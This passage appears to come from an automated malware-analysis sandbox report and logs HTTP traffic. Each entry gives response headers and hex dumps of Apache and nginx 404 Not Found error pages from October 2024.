6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:45 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:47 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:50 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:53 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 